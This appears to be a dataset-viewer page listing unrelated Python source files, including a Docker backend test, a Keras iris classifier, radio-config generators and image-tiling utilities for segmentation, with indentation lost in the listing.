multi_phy_model.output_files.file.append(fileType("{}.h".format(output_filename), rail_config_h))
rail_config_c = generator.render(generator.template_path_c)
multi_phy_model.output_files.file.append(fileType("{}.c".format(output_filename), rail_config_c))
railtest_generator = RailTest_rmrConfigGenerator(railAdapter)
rail_railtest_commands = railtest_generator.render(railtest_generator.template_path_railtest)
multi_phy_model.output_files.file.append(fileType("rail_test_commands.txt", rail_railtest_commands))
@staticmethod
def dump_output_files(multi_phy_model, output_path):
if not os.path.exists(output_path):
os.makedirs(output_path, exist_ok=True)
for file in multi_phy_model.output_files.file:
file_path = os.path.join(output_path, file.name)
if os.path.exists(file_path):
os.remove(file_path)
with open(file_path, 'w') as fc:
print ("Creating '{}'...".format(file_path))
fc.write(file.source_code)
fc.close()
|
11548358
|
import unittest, sys, StringIO
sys.path.append('.')
from maestro import py_backend, exceptions, utils
from requests.exceptions import HTTPError
utils.setQuiet(True)
class TestContainer(unittest.TestCase):
<EMAIL>("skipping")
def testStartStopRm(self):
p = py_backend.PyBackend()
c = p.create_container(utils.findImage('ubuntu'), {'command': '/bin/bash -c "while true; do echo hello world; sleep 60; done;"'})
state = p.docker_client.inspect_container(c)
self.assertFalse(state['State']['Running'])
p.start_container(c)
state = p.docker_client.inspect_container(c)
self.assertTrue(state['State']['Running'])
p.stop_container(c, 1)
state = p.docker_client.inspect_container(c)
self.assertFalse(state['State']['Running'])
p.remove_container(c, 1)
with self.assertRaises(HTTPError) as e:
p.docker_client.inspect_container(c)
self.assertEqual(str(e.exception), '404 Client Error: Not Found')
def testBuildImage(self):
dockerfile = """
FROM ubuntu
MAINTAINER test
"""
p = py_backend.PyBackend()
image_id = p.build_image(fileobj=StringIO.StringIO(dockerfile))[0]
self.assertEqual(p.inspect_image(image_id)['author'], 'test')
p.remove_image(image_id)
with self.assertRaises(HTTPError) as e:
p.inspect_image(image_id)
<EMAIL>("skipping")
def testGetIpAddress(self):
# TODO: image_id will change
p = py_backend.PyBackend()
c = p.run_container(utils.findImage('ubuntu'), {'command': 'ps aux'})
self.assertIsNotNone(c)
self.assertIsNotNone(p.get_ip_address(c))
if __name__ == '__main__':
unittest.main()
|
11548382
|
from setuptools import setup
with open("README.rst", "r") as f:
long_description = f.read()
setup(name = "matterbabble",
packages = ["matterbabble"],
entry_points = {"console_scripts": ["matterbabble = matterbabble.__main__:main"]},
version = "1.0.1",
description = "Connect Discourse threads to Matterbridge.",
long_description = long_description,
author = "<NAME>",
author_email = "<EMAIL>",
url = "https://github.com/DeclanHoare/matterbabble",
classifiers = ("Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent"),
install_requires = ["aiohttp", "bidict", "commonmark", "commonmarkextensions"])
|
11548405
|
import pandas as pd
import numpy as np
import keras
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout, Flatten
#--------------------------------
num_classes = 3 #Iris-setosa,Iris-versicolor,Iris-virginica
#--------------------------------
def createNetwork():
model = Sequential()
model.add(Dense(4 #num of hidden units
, input_shape=(4,))) #num of features in input layer
model.add(Activation('sigmoid')) #activation function from input layer to 1st hidden layer
model.add(Dense(num_classes)) #num of classes in output layer
model.add(Activation('sigmoid')) #activation function from 1st hidden layer to output layer
return model
model = createNetwork()
model.compile(loss='categorical_crossentropy'
, optimizer=keras.optimizers.Adam(lr=0.007)
, metrics=['accuracy']
)
#--------------------------------
chunk_size = 30
epochs = 1000
for epoch in range(0, epochs): #epoch should be handled here, not in fit command!
if epoch % 100 == 0:
print("epoch ",epoch)
chunk_index = 0
for chunk in pd.read_csv("iris.data", chunksize=chunk_size
, names = ["sepal_length","sepal_width","petal_length","petal_width","class"]):
#print("current chunk: ",chunk_index*chunk_size)
current_set = chunk.values #convert df to numpy array
features = current_set[:,0:4]
labels = current_set[:,4]
for i in range(0,labels.shape[0]):
if labels[i] == 'Iris-setosa':
labels[i] = 0
elif labels[i] == 'Iris-versicolor':
labels[i] = 1
elif labels[i] == 'Iris-virginica':
labels[i] = 2
labels = keras.utils.to_categorical(labels, num_classes)
#------------------------------------
model.fit(features, labels, epochs=1, verbose=0) #epochs handled in the for loop above
chunk_index = chunk_index + 1
#-------------------------------------------
df = pd.read_csv("iris.data", names = ["sepal_length","sepal_width","petal_length","petal_width","class"])
for index, row in df.iterrows():
features = row.values[0:4]
actual_label = row.values[4]
prediction = model.predict(np.array([features]))
prediction = np.argmax(prediction)
if prediction == 0:
predicted_class = "Iris-setosa"
elif prediction == 1:
predicted_class = "Iris-versicolor"
elif prediction == 2:
predicted_class = "Iris-virginica"
if predicted_class != actual_label:
print("*", end='')
print(" prediction: ",predicted_class, " - actual: ",actual_label)
|
11548428
|
from bson.objectid import ObjectId
from project.infrastructure.constants.mongo_collections import Collections
from project.infrastructure.data_layer.data_access_adapter import MongoDataLayer
class ValidateAdress:
@staticmethod
async def this_address_has_exist(criteria: dict) -> bool:
data_layer = MongoDataLayer(Collections.person_address)
result = await data_layer.get_by_filter(criteria)
if len(result) > 0:
return True
return False
@staticmethod
async def this_address_is_active(_id: ObjectId) -> bool:
data_layer = MongoDataLayer(Collections.person_address)
result = await data_layer.get_by_id(_id)
if "status" in result and result["status"] == "active":
return True
return False
|
11548454
|
from nurses_2.app import App
from nurses_2.widgets.widget_data_structures import Anchor
from .tetris import Tetris
class TetrisApp(App):
async def on_start(self):
tetris = Tetris(pos_hint=(.5, .5), anchor=Anchor.CENTER)
self.add_widget(tetris)
tetris.modal_screen.enable(callback=tetris.new_game, is_game_over=True)
TetrisApp().run()
|
11548465
|
from pyradioconfig.calculator_model_framework.CalcManager import CalcManager
from pyradioconfig.calculator_model_framework.model_serializers.human_readable import Human_Readable
from pyradioconfig.calculator_model_framework.model_serializers.static_timestamp_xml import Static_TimeStamp_XML
import os.path
import shutil
#
#
#
def create_csv_file(output_filename=None):
# Hack to force part family and revision
part_family = "dumbo"
part_rev = "A0"
radio_configurator = CalcManager(part_family, part_rev)
phy_names = radio_configurator.getPhyNames()
output_lines = list()
# Generate header line
# Create an empty model starting from the base profile
model = radio_configurator.create_modem_model_instance(profile_name="Base")
output_line = "phy_name"
for var in model.vars:
output_line = output_line + ", " + var.name
output_lines.append(output_line)
# Now print the data for each phy
for phy_name in phy_names:
print("Generating line in csv file for: %s" % phy_name)
# Run the calculator to populate model
model = radio_configurator.calculate_phy(phy_name)
# Generate row of data
output_line = phy_name
for var in model.vars:
output_line = output_line + ", %s" % var.value
output_lines.append(output_line)
# Write the lines to a file if one was specified.
# Otherwise, we'll just return the list to the calling function
# to do what it wants with the list.
if output_filename is not None:
outputfile = open(output_filename, 'w')
for line in output_lines:
outputfile.write('%s\n' % line)
outputfile.close()
else:
return output_lines
|
11548499
|
import FWCore.ParameterSet.Config as cms
totemTriggerRawToDigi = cms.EDProducer("TotemTriggerRawToDigi",
rawDataTag = cms.InputTag(""),
# IMPORTANT: leave 0 to load the default configuration from
# DataFormats/FEDRawData/interface/FEDNumbering.h
fedId = cms.uint32(0)
)
|
11548538
|
from __future__ import absolute_import, division, print_function, unicode_literals
from echomesh.util import Log
from echomesh.util.thread.MasterRunnable import MasterRunnable
from gittwit.twitter.Search import Loop
class MultiSearch(MasterRunnable):
def __init__(self, callback, interval=2, preload=1, name='MultiSearch'):
super(MultiSearch, self).__init__()
self.callback = callback
self.interval = interval
self.preload = preload
self.name = name
self.searches = {}
self.index = 0
def add(self, search):
if search in self.searches:
LOGGER.error('Already searching %s')
else:
self.index += 1
loop = Loop(search, self.callback, self.interval, self.preload,
name = '%s:%s' % (self.name, self.index))
self.searches[search] = loop
self.add_slave(loop)
loop.run()
def remove(self, search):
loop = self.searches.get(search)
if loop:
del self.searches[search]
loop.stop()
self.remove_slave(loop)
else:
LOGGER.error('No search %s', search)
|
11548542
|
from django.apps import AppConfig
from django.utils.translation import gettext_lazy as _
class BookkeepingConfig(AppConfig):
name = "byro.bookkeeping"
class ByroPluginMeta:
document_categories = {
"byro.bookkeeping.receipt": _("Receipt"),
"byro.bookkeeping.invoice": _("Invoice"),
"byro.bookkeeping.account.statement": _("Statement"),
}
|
11548583
|
import torch
import numpy as np
import math
import util.const as const
import util.run_length as run_length
import util.submit as submit
__all__ = [ 'pad_image', 'generate_tile_names', 'get_tile_layout', 'get_img_name', 'get_tile', 'stitch_predictions', 'merge_preds_if_possible' ]
def remove_tile_borders(image, tile_borders):
'''
input:
image: a Pytorch Variable of size (batch_size, num_channels, height, width)
tile_border: a tuple of ints (height_border, width_border)
output:
image: a Pytorch Variable of size (batch_size, num_channels, height - 2 * tile_height_border, width - 2 * tile_width_border)
'''
tile_height_border, tile_width_border = tile_borders
assert tile_height_border >= 0
if tile_height_border > 0: # No need to remove border if it's 0
image = image[:, :, tile_height_border:-tile_height_border, :]
assert tile_width_border >= 0
if tile_width_border > 0: # No need to remove border if it's 0
image = image[:, :, :, tile_width_border:-tile_width_border]
image = image.contiguous()
return image
def get_tile_border(img_length, tile_length, num_tiles):
'''
input:
img_length: int representing either image height or width
tile_length: int representing either tile height or width
num_tiles: int representing how many tiles are along this dimension
output:
tile_border: int
Note that tile_border can be 0 when img_length == tile_length
Their relationships are:
Eq. 1
padded_img_length == img_length + 2 * tile_border
Eq. 2
padded_img_length == num_tiles * tile_length - (num_tiles - 1) * 2 * tile_border
Eq. 3
tile_body_length == tile_length - 2 * tile_border
Eq. 4
padded_img_length == num_tiles * tile_body_length + 2 * tile_border
'''
# To solve for tile_border, combine and reorganize Eq. 1 and Eq. 2
tile_border = (num_tiles * tile_length - img_length) / (num_tiles * 2)
assert tile_border >= 0 and tile_border % 1 == 0
tile_border = int(tile_border)
# Verify tile_border we got is right
padded_img_length = img_length + 2 * tile_border # Eq. 1
tile_body_length = tile_length - 2 * tile_border # Eq. 3
assert padded_img_length == num_tiles * tile_body_length + 2 * tile_border # Eq. 4
return tile_border
def get_tile_layout(tile_size, img_size):
'''
input:
tile_size: a tuple of ints (height, width) representing the size of a tile
img_size: a tuple of ints (height, width) representing the size of a whole image
output:
tile_layout: a tuple of ints (num_of_rows, num_of_cols)
tile_border: a tuple of ints (height_border, width_border)
'''
tile_height, tile_width = tile_size
img_height, img_width = img_size
num_of_rows = math.ceil(img_height / tile_height )
num_of_cols = math.ceil(img_width / tile_width )
tile_layout = (num_of_rows, num_of_cols)
height_border = get_tile_border(img_height, tile_height, num_of_rows)
width_border = get_tile_border(img_width, tile_width, num_of_cols)
tile_border = (height_border, width_border)
return tile_layout, tile_border
def generate_tile_names(img_names, tile_size, img_size):
'''
input:
img_names: a list of strings consisting of all image names
tile_size: a tuple of ints (height, width) representing the size of a tile
img_size: a tuple of ints (height, width) representing the size of a whole image
output:
tile_names: a list of strings consisting of all image tile names in img_name-<row_idx>-<col_idx> format
'''
tile_layout, _ = get_tile_layout(tile_size, img_size)
num_of_rows, num_of_cols = tile_layout
tile_names = []
for img_name in img_names:
tile_names_in_img = []
for row_idx in range(1, num_of_rows+1):
for col_idx in range(1, num_of_cols + 1):
tile_name = img_name + '-' + str(row_idx) + '-' + str(col_idx)
tile_names_in_img.append(tile_name)
tile_names += tile_names_in_img
return tile_names
def get_img_name(tile_name):
'''
get whole image name from tile name
'''
return tile_name.split('-')[0]
def get_tile_pos(tile_name):
tile_row_idx, tile_col_idx = tile_name.split('-')[1], tile_name.split('-')[2]
tile_pos = int(tile_row_idx), int(tile_col_idx)
return tile_pos
def get_tile(img, tile_name, tile_size):
'''
get tile from image
'''
img_size = img.shape[1:]
tile_layout, tile_border = get_tile_layout(tile_size, img_size)
tile_pos = get_tile_pos(tile_name)
tile = crop_tile(img, tile_pos, tile_size, tile_layout, tile_border)
return tile
def pad_image(img, paddings):
height_padding, width_padding = paddings
channel_padding = (0, 0)
height_padding = (height_padding, height_padding)
width_padding = (width_padding, width_padding)
padded_img = np.lib.pad(img, (channel_padding, height_padding, width_padding), 'constant')
return padded_img
def remove_paddings(mask, paddings):
'''
input:
mask: numpy array of shape (height, width)
paddings: tuple of ints, (height_padding, width_padding)
'''
height_padding, width_padding = paddings
assert height_padding >= 0
if height_padding > 0: # No need to remove padding if it's 0
mask = mask[height_padding:-height_padding, :]
assert width_padding >= 0
if width_padding > 0: # No need to remove padding if it's 0
mask = mask[:, width_padding:-width_padding]
return mask
def crop_tile(img, tile_pos, tile_size, tile_layout, tile_border):
'''
crop from a image
'''
padded_img = pad_image(img, tile_border)
# unpack inputs
num_of_rows, num_of_cols = tile_layout
_, img_height, img_width = img.shape
row_idx, col_idx = tile_pos
tile_h, tile_w = tile_size
height_border, width_border = tile_border
t_body_h, t_body_w = tile_h - 2 * height_border, tile_w - 2 * width_border
# print('Tile Size: {}, {}'.format(tile_h, tile_w))
# print('Tile Border: {}, {}'.format(height_border, width_border))
# print('Tile Body: {}, {}'.format(t_body_h, t_body_w))
crop_y_start = (row_idx - 1) * t_body_h
crop_x_start = (col_idx - 1) * t_body_w
if row_idx == num_of_rows: # if the tile is in last row
# leave all remainder to the last tile
crop_y_end = img_height + 2*height_border
else:
crop_y_end = crop_y_start + t_body_h + 2*height_border
if col_idx == num_of_cols: # if the tile is in last col
# leave all remainder to the last tile
crop_x_end = img_width + 2*width_border
else:
crop_x_end = crop_x_start + t_body_w + 2*width_border
cropped_img = padded_img[ :, crop_y_start:crop_y_end, crop_x_start:crop_x_end ]
return cropped_img
def merge_preds_if_possible(exp_name, tile_probs, paddings, img_rles, is_ensemble=False, ensemble_dir=None, reverse_test_time_aug=None):
'''
input:
tile_probs: a dict of numpy arrays, with image tile names as keys and predicted probibility maps as values
img_rles: a dict of strings, with image names as keys and predicted run-length-encoded masks as values
is_ensemble: a boolean indicating if this is in ensemble mode or not
reverse_test_time_aug: a function that reverse the test time augmentation done to the input test image
'''
if is_ensemble:
assert img_rles is None
assert ensemble_dir is not None
else:
assert img_rles is not None
assert reverse_test_time_aug is None # Never do Test Time augmentation right before submitting
if len(tile_probs) == 0:
return
# get tile names of computed probability maps
tile_names = list(tile_probs.keys())
# compute number of tiles in a image
tile_size = tile_probs[tile_names[0]].shape[1:]
padded_img_size = np.add(const.img_size, np.multiply(paddings, 2))
tile_layout, _ = get_tile_layout(tile_size, padded_img_size)
num_of_rows, num_of_cols = tile_layout
num_tiles = num_of_rows * num_of_cols
# get image names from tile names
tiles_by_imgs = group_tile_names(tile_names)
img_names = tiles_by_imgs.keys()
for img_name in img_names:
if len(tiles_by_imgs[img_name]) == num_tiles:
# all tiles of this image are here and ready to be merged
tile_probs_of_one_image = create_dict_from_dict(tiles_by_imgs[img_name], tile_probs)
img_prob = merge_tiles(tile_probs_of_one_image, tile_layout)
# merged into whole image with shape: (1280, 1920)
img_prob = remove_paddings(img_prob, paddings)
assert img_prob.shape == const.img_size # image shape: (1280, 1918)
# undo applied data augmentation for Test Time Augmentation
if reverse_test_time_aug is not None:
img_prob = reverse_test_time_aug(img_prob)
if is_ensemble:
# save predictions
submit.save_prob_map(ensemble_dir, img_name, img_prob)
else:
# generate image mask from image probability map
img_mask = np.zeros(img_prob.shape)
img_mask[img_prob > 0.5] = 1
# employ Run Length Encoding
img_rles[img_name] = run_length.encode(img_mask)
# remove merged tiles from tile_probs
remove_keys_from_dict(tiles_by_imgs[img_name], tile_probs)
return
def group_tile_names(tile_names):
'''
input:
tile_names: a list of strings, tile names of all images
output:
tiles_by_imgs: a dict with image names as keys and tile names of a image as values
'''
tiles_by_imgs = {}
for tile_name in tile_names:
img_name = get_img_name(tile_name)
if img_name not in tiles_by_imgs:
tiles_by_imgs[img_name] = [tile_name]
else:
tiles_by_imgs[img_name].append(tile_name)
return tiles_by_imgs
def create_dict_from_dict(some_keys, large_dict):
'''
from:
https://stackoverflow.com/questions/3420122/filter-dict-to-contain-only-certain-keys
'''
small_dict = { a_key: large_dict[a_key] for a_key in some_keys }
return small_dict
def remove_keys_from_dict(some_keys, dictionary):
'''
from:
https://stackoverflow.com/questions/8995611/removing-multiple-keys-from-a-dictionary-safely
'''
for a_key in some_keys:
dictionary.pop(a_key, None)
return
def merge_tiles(tile_masks, tile_layout):
'''
input:
tile_masks: a dict of numpy arrays, with tile names of a certain image as keys and their predicted masks as values
tile_layout: a tuple of ints
output:
img_mask: a numpy array
'''
tile_names = list(tile_masks.keys())
num_of_rows, num_of_cols = tile_layout
assert len(tile_names) == num_of_rows * num_of_cols
_, tile_height, tile_width = tile_masks[tile_names[0]].shape
img_mask = np.zeros((num_of_rows * tile_height, num_of_cols * tile_width))
for tile_name in tile_names:
tile_row_idx, tile_col_idx = get_tile_pos(tile_name)
start_y = (tile_row_idx - 1) * tile_height
start_x = (tile_col_idx - 1) * tile_width
end_y = tile_row_idx * tile_height
end_x = tile_col_idx * tile_width
img_mask[start_y:end_y, start_x:end_x] = tile_masks[tile_name]
return img_mask
|
11548590
|
import os
__version_path = os.path.join(
os.path.abspath(
os.path.dirname(__file__)),
'version.txt',
)
with open(__version_path, 'r') as f:
__version__ = f.read()
default_app_config = 'wizard_builder.apps.WizardBuilderConfig'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.